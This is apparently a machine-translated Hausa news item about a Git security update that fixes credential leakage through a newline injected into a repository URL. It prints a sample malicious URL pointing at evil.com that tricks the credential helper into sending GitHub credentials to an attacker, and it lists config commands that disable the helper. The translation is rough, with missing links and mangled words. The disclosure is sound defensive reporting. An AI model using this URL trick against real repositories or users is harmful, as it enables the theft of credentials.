gyaran gyare-gyare na tsarin sarrafa tushen rarraba Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 da 2.17.4, in wanda ya kawar () a cikin ma'aikata"", wanda ke haifar da aika takaddun shaida ga mai watsa shiri mara kyau lokacin da abokin ciniki na git ya sami damar shiga wurin ajiya ta amfani da URL na musamman wanda ya ƙunshi sabon layi. Ana iya amfani da raunin don shirya takaddun shaida daga wani runduna don aika zuwa sabar da maharin ke sarrafawa.
Lokacin ƙayyadaddun URL kamar "https://evil.com?%0ahost=github.com/", mai kula da takaddun shaida lokacin haɗi zuwa mai watsa shiri mugunta.com zai wuce sigogin tantancewa da aka kayyade don github.com. Matsalar tana faruwa lokacin aiwatar da ayyuka kamar "git clone", gami da sarrafa URLs don ƙananan kayayyaki (misali, "git submodule update" zai aiwatar da URLs da aka kayyade ta atomatik a cikin fayil ɗin .gitmodules daga maajiyar). Lalacewar shine mafi haɗari a cikin yanayin da mai haɓakawa ya rufe wurin ajiya ba tare da ganin URL ɗin ba, misali, lokacin aiki tare da ƙananan kayayyaki, ko a cikin tsarin da ke aiwatar da ayyuka na atomatik, misali, a cikin rubutun ginin kunshin.
Don toshe lahani a cikin sabbin iri ƙetare wani sabon layi a cikin kowane ƙimar da aka watsa ta ka'idar musayar shaidar shaidar. Don rarrabawa, zaku iya bin diddigin sakin sabunta fakitin akan shafuka , , , , , , .
A matsayin mafita don toshe matsalar Kar a yi amfani da credential.helper lokacin shiga ma'ajiyar jama'a kuma kar a yi amfani da "git clone" a cikin yanayin "--recurse-submodules" tare da wuraren da ba a bincika ba. Don musaki gaba ɗaya mai kula da credential.helper, wanda yayi da kuma dawo da kalmomin shiga daga , kariya ko fayil tare da kalmomin shiga, zaku iya amfani da umarni:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
source: budenet.ru